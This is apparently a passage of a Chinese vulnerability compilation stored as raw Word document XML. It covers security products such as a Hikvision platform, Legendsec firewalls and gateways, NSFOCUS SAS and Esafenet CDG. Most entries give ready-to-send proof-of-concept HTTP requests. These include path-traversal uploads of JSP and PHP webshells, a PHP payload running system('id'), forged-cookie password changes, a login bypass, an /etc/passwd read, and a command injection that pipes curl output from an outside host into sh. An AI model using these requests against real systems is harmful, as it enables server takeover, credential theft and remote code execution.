        </w:rPr>
        <w:t>处理用户输入时可触发</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXE。后续修复规则依旧可被绕过，本次漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>即为之前修复规则的绕过。攻击者可利用该漏洞列目录、读取文件，甚至可能获取应用系统的管理员权限。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HiKVISION 综合安防管理平台: files 任意文件上传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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>海康威视综合安防管理平台存在files任意文件上传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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最新版本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 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi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 /center/api/files;.html HTTP/1.1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st: 10.10.10.10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multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a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9PggsiM755PLa54a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name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"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application/zip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lt;%jsp马%&gt;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9PggsiM755PLa54a--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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C 2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 /center/api/files;.html HTTP/1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st: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multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54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9PggsiM755PLa54a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name="file"; filename="../../../../../../../../../../../opt/hikvisio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/web/components/tomcat85linux64.1/webapps/eportal/new.jsp" Content-Type: application/zip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lt;%out.print("test3");%&gt;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9PggsiM755PLa54a--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr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/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3039745"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="23664841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48412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HiKVISION 综合安防管理平台: report 任意文件上传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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>海康威视综合安防管理平台存在report任意文件上传漏洞,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者通过构造特殊的请求包可以上传任意文件，获取服务器权限.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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最新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 1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi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 /svm/api/external/report HTTP/1.1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st: 10.10.10.10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multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a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9PggsiM755PLa54a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name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"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application/zip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lt;%jsp马%&gt;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9PggsiM755PLa54a--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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C 2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 /svm/api/external/report HTTP/1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st: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multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa5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a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9PggsiM755PLa54a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name="file"; filename="../../../../../../../../../../../opt/hikvision/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eb/components/tomcat85linux64.1/webapps/eportal/new.jsp" Content-Type: application/zip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lt;%out.print("test");%&gt;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9PggsiM755PLa54a—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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 3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 /svm/api/external/report HTTP/1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st: xxxxx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Length: 2849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ache-Control: max-age=0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c-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100" Sec-Ch-Ua-Mobile: ?0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c-Ch-Ua-Platform: "macOS" Upgrade-Insecure-Requests: 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-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KH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ML, like Gecko) Chrome/100.0.4896.75 Safari/537.36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rigin: null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multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755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La54a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: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/web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,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9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c-Fetch-Site: cross-sit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c-Fetch-Mode: navigat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c-Fetch-User: ?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c-Fetch-Dest: document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Encoding: gzip, deflat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Language: zh-CN,zh;q=0.9,en;q=0.8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nection: clos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9PggsiM755PLa54a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name="file"; filename="../../../tomcat85linux64.1/web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pps/els/static/111.jsp" Content-Type: application/zip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xxxx(优先建议哥斯拉 base64) ------WebKitFormBoundary9PggsiM755PLa54a—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr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/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2243455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="173370455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04558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/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2146935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="37275705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57055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/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>GET /els/static/test.jsp HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2606040"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="125552192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21927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 xml:space="preserve">（已公开poc）网神 SecGate 3600 防火墙: obj_app_upfile 任意文件上传漏洞 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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>网神防火墙存在任意文件上传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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最新版本</w:t>
      </w:r>
    </w:p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</w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>出现漏洞的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve"> webui/modules/object/app.mds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 /?g=obj_app_upfile HTTP/1.1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st: x.x.x.x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: */*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Encoding: gzip, deflate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Length: 574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multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc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-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)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JpMyThWnAxbcBBQc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name="MAX_FILE_SIZE"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000000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JpMyThWnAxbcBBQc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name="upfile"; filename="vulntest.php"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text/plain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lt;?php php马?&gt;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JpMyThWnAxbcBBQc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name="submit_post"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j_app_upfile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JpMyThWnAxbcBBQc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name="__hash__"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b9d6b1ab7479ab69d9f71b05e0e9445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JpMyThWnAxbcBBQc--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr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/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2915285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="136352912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29125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网神 SecSSL 3600安全接入网关系统: 任意密码修改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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>网神</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> SecSSL 3600安全接入网关系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存在任意密码修改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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最新</w:t>
      </w:r>
    </w:p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</w:p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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">验证 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，获取用户列表 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>zkec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ET /admin/group/x_group.php?id=2</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi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okie: admin_id=1; gw_admin_ticket=1;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2301240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1053738478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38478" name="图片 1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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>修改用户密码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5" w:name="_Hlk142597477"/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OST /changepass.php?type=2 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okie: admin_id=1; gw_user_ticket=ffffffffffffffffffffffffffffffff; last_step_param={"this_name":"test","subAuthId":"1"}</w:t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ld_pass=&amp;password=Test123!@&amp;repassword=Test123!@</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="5"/>
    </w:tbl>
    <w:p>
      <w:pPr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/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2164080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="2053625523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25523" name="图片 1" descr="文本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 /?g=obj_app_upfile HTTP/1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st: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: */* Accept-Encoding: gzip, deflat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Length: 574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Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBB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Qc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-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)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JpMyThWnAxbcBBQc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name="MAX_FILE_SIZE" 10000000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JpMyThWnAxbcBBQc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name="upfile"; filename="vulntest.php" Content-Type: text/plain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lt;?php system("id");unlink(__FILE__);?&gt;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JpMyThWnAxbcBBQc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name="submit_post" obj_app_upfil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JpMyThWnAxbcBBQc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-Disposition: form-data; name="__hash__" 0b9d6b1ab7479ab69d9f71b05e0e9445</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi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----WebKitFormBoundaryJpMyThWnAxbcBBQc--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>默认上传路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /secgate/webui/attachements/ ， 访问 attachements/xxx.php 文</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3180080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="1255343745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43745" name="图片 1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汉得SRM: tomcat.jsp 登录绕过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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>汉得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>SRM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>tomcat.jsp 登录绕过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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最新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Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/tomcat.jsp?dataName=role_id&amp;dataValue=1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>/tomcat.jsp?dataName=user_id&amp;dataValue=1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>然后访问后台：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/main.screen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>即可绕过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QQ客户端: 命令执行漏洞（1 click）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ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>QQ客户端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存在点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>命令执行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ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>v8.9.0.8555 / 内核版本 046123 安卓QQ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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击者向目标发送特定恶意链接，目标QQ用户接受到消息后，点击链接，即反弹出一个shell。</w:t>
      </w:r>
    </w:p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绿盟SAS安全审计系统: GetFile 任意文件读取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ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>绿盟SAS安全审计系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GetFile 任意文件读取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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最新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ET /webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd HTTP/1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st: 1.1.1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-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_9) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/27.0.815.0 Safari/532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Encoding: gzip, deflat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: */*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nection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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绿盟SAS安全审计系统: Exec 远程命令执行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ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>绿盟SAS安全审计系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exec 远程命令执行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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最新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ET /webconf/Exec/index?cmd=curl%20http://example.com/icons/logo.jpg|sh HTTP/1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st: 1.1.1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okie: PHPSESSID=d2edd4a6b5544181b406b355220c97d6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-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0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: */*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Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Encoding: gzip, deflat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c-Fetch-Dest: empty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c-Fetch-Mode: cors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c-Fetch-Site: same-origin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e: trailers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nection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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 xml:space="preserve">（已公开poc）绿盟SAS安全审计系统: </w:t>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="_Hlk142599222"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>local_user.php 任意用户登录漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/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ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>绿盟SAS安全审计系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> local_user.php 任意用户登录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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最新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ET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&amp;method=login&amp;user_account=admin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HTTP/1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st: 1.1.1.1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okie: PHPSESSID=d2edd4a6b5544181b406b355220c97d6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-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0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: */*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Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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cept-Encoding: gzip, deflate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c-Fetch-Dest: empty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c-Fetch-Mode: cors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c-Fetch-Site: same-origin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/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e: trailers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Consolas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nection: close</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pP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亿赛通电子文档安全管理系统: importFileType 文件上传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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>亿赛通电子文档安全管理系统存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>文件上传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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最新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bookmarkStart w:id="7" w:name="_Hlk142599083"/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POST /CDGServer3/fileType/importFileType.do?flag=syn_user_policy HTTP/1.1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Host: 1.1.1.1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User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 4.0; Trident/4.1)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Accept-Encoding: gzip, deflate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Accept: */*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Connection: close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Content-Length: 193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Content-Type: multipart/form-data; boundary=4932432038ca3e08ab3b0686e430c9c7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--4932432038ca3e08ab3b0686e430c9c7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Content-Disposition: form-data; name="fileshare"; filename="/..\\..\\..\\..\\webapps\\ROOT\\3FMXSB.jspx"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ZnGxBeThmX</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
                <w:b/>
                <w:bCs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--4932432038ca3e08ab3b0686e430c9c7--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="7"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p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color w:val="1F2329"/>
          <w:sz w:val="22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傲盾信息安全管理系统: 前台远程命令执行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描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>傲盾信息安全管理系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存在前台远程命令执行漏洞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漏洞等级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w: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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&lt;=7.1.7.24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
